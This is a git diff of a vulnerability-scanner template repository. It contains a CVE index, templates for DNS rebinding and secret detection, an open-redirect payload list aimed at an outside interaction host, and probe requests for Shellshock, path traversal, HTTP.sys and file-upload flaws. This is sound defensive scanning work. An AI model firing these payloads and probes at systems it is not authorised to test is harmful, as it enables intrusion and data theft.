{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"} {"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}

View File

@ -1 +1 @@
24979948d83a1e549dbe56133dba3db5 d1c0809e63305403ca431401cfcebe07

View File

@ -1,5 +1,4 @@
id: dns-rebinding id: dns-rebinding
info: info:
name: DNS Rebinding Attack name: DNS Rebinding Attack
author: ricardomaia author: ricardomaia
@ -10,6 +9,8 @@ info:
- https://capec.mitre.org/data/definitions/275.html - https://capec.mitre.org/data/definitions/275.html
- https://payatu.com/blog/dns-rebinding/ - https://payatu.com/blog/dns-rebinding/
- https://heimdalsecurity.com/blog/dns-rebinding/ - https://heimdalsecurity.com/blog/dns-rebinding/
metadata:
max-request: 2
tags: redirect,dns,network tags: redirect,dns,network
dns: dns:
@ -20,7 +21,7 @@ dns:
- type: regex - type: regex
part: answer part: answer
regex: regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$' - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
extractors: extractors:
- type: regex - type: regex
@ -28,35 +29,22 @@ dns:
name: IPv4 name: IPv4
group: 1 group: 1
regex: regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})' - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- name: "{{FQDN}}" - name: "{{FQDN}}"
type: AAAA type: AAAA
matchers: matchers:
# IPv6 Compressed # IPv6 Compressed and Full
- type: regex - type: regex
part: answer part: answer
regex: regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# IPv6
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
extractors: extractors:
- type: regex - type: regex
part: answer part: answer
name: IPv6_Compressed name: IPv6_ULA
group: 1 group: 1
regex: regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
- type: regex
part: answer
name: IPv6
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950

View File

@ -18,7 +18,7 @@ file:
- type: regex - type: regex
name: extracted-token name: extracted-token
regex: regex:
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\s)*(:|=)+"
- type: regex - type: regex
name: extracted-endpoints name: extracted-endpoints
@ -30,5 +30,9 @@ file:
- type: regex - type: regex
name: extracted-uri name: extracted-uri
regex: regex:
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+" - "(?i)([a-z]{2,10}):(//|/)[a-z0-9\\./?&-_=:]+"
# digest: 4a0a00473045022074fd41f8b59517248d39216756a55be729fe598400825417fc9ab281c4c626d6022100f3a770bad05731314a45020b4a94b393b96dfae3590e0e526327ac84fa760aa2:922c64590222798bb761d5b6d8e72950 - type: regex
name: AMAZON-ACCES-KEY
regex:
- "(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
# digest: 4a0a0047304502200738658ef4985c1261c662fd545a23504b402343ad994af584866d74d37e11ac022100c8213e439b8a574bee55ce0881363c0964830df8255bcd89249d37a778f038ba:922c64590222798bb761d5b6d8e72950

View File

@ -1,4 +1,4 @@
id: linkedin-client-id id: linkedin-id
info: info:
name: Linkedin Client ID name: Linkedin Client ID
@ -13,4 +13,4 @@ file:
- type: regex - type: regex
regex: regex:
- "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950

View File

@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-25031 cve-id: CVE-2018-25031
cwe-id: CWE-20 cwe-id: CWE-20
epss-score: 0.00265 epss-score: 0.00265
epss-percentile: 0.64105 epss-percentile: 0.65414
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -30,7 +30,6 @@ info:
shodan-query: http.component:"Swagger" shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057" fofa-query: icon_hash="-1180440057"
tags: headless,cve,cve2018,swagger,xss,smartbear tags: headless,cve,cve2018,swagger,xss,smartbear
headless: headless:
- steps: - steps:
- args: - args:
@ -71,4 +70,4 @@ headless:
words: words:
- "swagger" - "swagger"
case-insensitive: true case-insensitive: true
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950

View File

@ -21,9 +21,6 @@ headless:
- action: waitload - action: waitload
payloads: payloads:
redirect: redirect:
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
- '%09/oast.live/' - '%09/oast.live/'
- '%5C%5Coast.live/%252e%252e%252f' - '%5C%5Coast.live/%252e%252e%252f'
- '%5Coast.live' - '%5Coast.live'
@ -112,10 +109,14 @@ headless:
- 'cgi-bin/redirect.cgi?oast.live' - 'cgi-bin/redirect.cgi?oast.live'
- 'out?oast.live' - 'out?oast.live'
- 'login?to=http://oast.live' - 'login?to=http://oast.live'
- '#/oast.live'
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "Interactsh Server" - "Interactsh Server"
# digest: 4b0a00483046022100a8c70dc73a12a3a282a012774a3a10a99f153d80d4c16a01f2bb4bd9770903dc022100f491074035d26885797db4152bad2ecd436ebf4d1f7fa479d402303ceac17db0:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,33 @@
id: CNVD-2023-96945
info:
name: McVie Safety Digital Management Platform - Arbitrary File Upload
author: DhiyaneshDk
severity: high
description: |
Jiangsu Maiwei Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.
reference:
- https://blog.csdn.net/weixin_42628854/article/details/136036109
metadata:
verified: true
max-request: 1
fofa-query: "安全生产数字化管理平台"
tags: cnvd,cnvd2023,file-upload,mcvie
http:
- method: GET
path:
- "{{BaseURL}}/Content/Plugins/uploader/FileChoose.html"
matchers-condition: and
matchers:
- type: word
words:
- "选择文件"
- "提交"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2014-6271 cve-id: CVE-2014-6271
cwe-id: CWE-78 cwe-id: CWE-78
epss-score: 0.97564 epss-score: 0.97559
epss-percentile: 0.99999 epss-percentile: 0.99997
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata: metadata:
max-request: 8 max-request: 8
@ -58,4 +58,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799 cve-id: CVE-2014-8799
cwe-id: CWE-22 cwe-id: CWE-22
epss-score: 0.17844 epss-score: 0.17844
epss-percentile: 0.95686 epss-percentile: 0.96002
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata: metadata:
max-request: 1 max-request: 1
@ -50,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
reference:
- https://www.exploit-db.com/exploits/36773
- https://www.securitysift.com/an-analysis-of-ms15-034/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1635
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10.0
cwe-id: CWE-94
cve-id: CVE-2015-1635
cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: microsoft
product: windows_7
shodan-query: '"Microsoft-IIS" "2015"'
tags: cve,cve2015,kev,microsoft,iis,rce
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
Range: "bytes=0-18446744073709551615"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HTTP Error 416"
- "The requested range is not satisfiable"
condition: and
- type: word
part: header
words:
- "Microsoft"
# digest: 4b0a0048304602210089c354040a56574a5a17f803370b94a87244e98159c6eff1b1b07f666e2c834a022100936fbfa7282962b47f7de82e84e67d0cc32921b313c84406269eef740f6ccec0:922c64590222798bb761d5b6d8e72950

View File

